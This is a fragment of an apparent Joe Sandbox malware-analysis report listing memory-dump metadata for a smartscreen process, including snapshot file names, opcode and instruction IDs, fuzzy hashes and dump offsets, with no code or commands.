                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: dc0a48ae012d3b4c2078c12dca50c35738c16706a88f301ed8c18307fe6b375d
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: 03E0ED70B0D61E46FBA49544C8A07B97254EB94700F1501B8D58EE33E1DDB8AF848B45
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2145779204.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9bb10000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4912947880727a3d7bda8338e856f71c254f047fa62c9ee66c83487efeecaf5
                                                              • Instruction ID: abe160f6f3394359a24da4be55122030c6d016def6287fbd73bbff49d261a8cc
                                                              • Opcode Fuzzy Hash: c4912947880727a3d7bda8338e856f71c254f047fa62c9ee66c83487efeecaf5
                                                              • Instruction Fuzzy Hash: FAE0463154E7C08FCB0B9B3488A88903F70EE1721138A41EAC049CF1B3DA2E894AC701
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.2143770066.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_42_2_7ffd9b770000_smartscreen.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: cf0f6ce9c36b9e94d43a439457835291d0878140296cc44fe155b765fe1583d3
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: 96C0123062990E8FDA40BB28C8C9C24BBA0FB0F201BDA01E0E00CC71B1D6A9A8908700
                                                              Memory Dump Source